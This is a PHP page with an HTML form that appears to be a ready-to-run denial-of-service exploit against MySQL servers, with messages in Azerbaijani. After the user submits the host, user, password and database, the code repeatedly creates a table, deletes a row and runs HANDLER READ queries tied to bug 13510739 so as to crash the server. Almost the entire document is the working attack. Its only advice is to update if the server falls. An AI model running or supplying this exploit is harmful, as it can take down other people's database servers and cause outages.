test

1. <html>
2. <head>
3. <style type="text/css">
4. body
5. {
6. background-color:black;
7. color:red;
8. }
9. </style>
10. <table border="1">
11. <form name="dostest" method="post" action="">
12. <tr><td><label><ul><li>Mysql Server (Host):</li></ul></label>
13. <td><input type="text" name="host" id="host" size="40"/></td></tr>
14.  
15. <tr><td><label><ul><li>Mysql User:</li></ul></label>
16. <td><input type="text" name="user" id="user" size="40" /></td></tr>
17.  
18.  
19. <tr><td><label><ul><li>Mysql Userin Parolu:</li></ul></label>
20. <td><input type="text" name="pass" id="pass" size="40" /></td></tr>
21.  
22. <tr><td><label><ul><li>Mysql Database:(Baza)</li></ul></label>
23. <td><input type="text" name="database" id="database" size="40" /></td></tr>
24.  
25. </table>
26. <?php echo str_repeat('<ul>'. PHP_EOL,3);?>
27. <input type="submit" name="s2k" id="s2k" value="Exploit Et Gor nese Alinir?)" />
28. <?php echo str_repeat('</ul>'. PHP_EOL,3);?>
29. </form>
30.  
31.  
32.  
33.  
34.  
35.  
36.  
37.  
38. <?php
39. /*
40. Coded By AkaStep
41.  
42. Vuln Discovered by:(eromang)
43. http://pastebin.com/tCxNTD96
44.  
45. */
46. error_reporting('off');
47. if(isset($_POST['s2k']) && isset($_POST['host']) && !empty($_POST['host']) && isset($_POST['user']) && !empty($_POST['user']) && isset($_POST['pass'])
48. &&!empty($_POST['pass']) && isset($_POST['database']) && !empty($_POST['database']))
49. {
50.  
51. $_POST=array_map('htmlentities',$_POST);
52.  
53. $mysqlhost=$_POST['host'];
54. $mysqluser=$_POST['user'];
55. $mysqluserpass=$_POST['pass'];
56. $mysql_db=$_POST['database'];
57.  
58. //die(var_dump($_POST));
59.  
60.  
61. /* EXPLOIT */
62.  
63. $sl=mysql_connect($mysqlhost,$mysqluser,$mysqluserpass) or die('Qosula Bilmirem Mysql Servere');
64. $selectdb=mysql_selectdb($mysql_db) or die('Database Yoxdur! Yaxud Grant Yoxdur:*(');
65. echo '1)Exploit Edirik.Gorek ne olur)) Gozle...<br>';
66.  
67. for($i=0;$i<=3;$i++)
68. {
69.  
70. mysql_query('DROP TABLE IF EXISTS `bug13510739`',$sl) or die('Icra Ede bilmirem: #0 ()');
71. mysql_query('CREATE TABLE `bug13510739` (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB',$sl) or die('Icra Ede bilmirem: #1 ()');
72. mysql_query('INSERT INTO `bug13510739` VALUES (1), (2), (3), (4)') or die('icra Ede bilmirem #2');
73. mysql_query('DELETE FROM bug13510739 WHERE c=2') or die('Icra ede bilmirem #3');
74. mysql_query('HANDLER bug13510739 OPEN') or die('Icra ede bilmirem #4');
75. mysql_query('HANDLER bug13510739 READ `primary` = (2)') or die('Icra ede bilmirem #5');
76. mysql_query('HANDLER bug13510739 READ `primary` NEXT')  or die('Icra ede bilmirem #6');
77. mysql_query('DROP TABLE bug13510739') or die('icra ede bilmirem! #7');
78. }
79.  
80.  
81. die('2)Exploit edildi. <br>
82. 3)Son.<br>
83. 4)Server Down-a Getse Demeli Vulnerabledir MYSQL. Update Etmelisen.<br>');
84. /* EOF */
85. }
86. ?>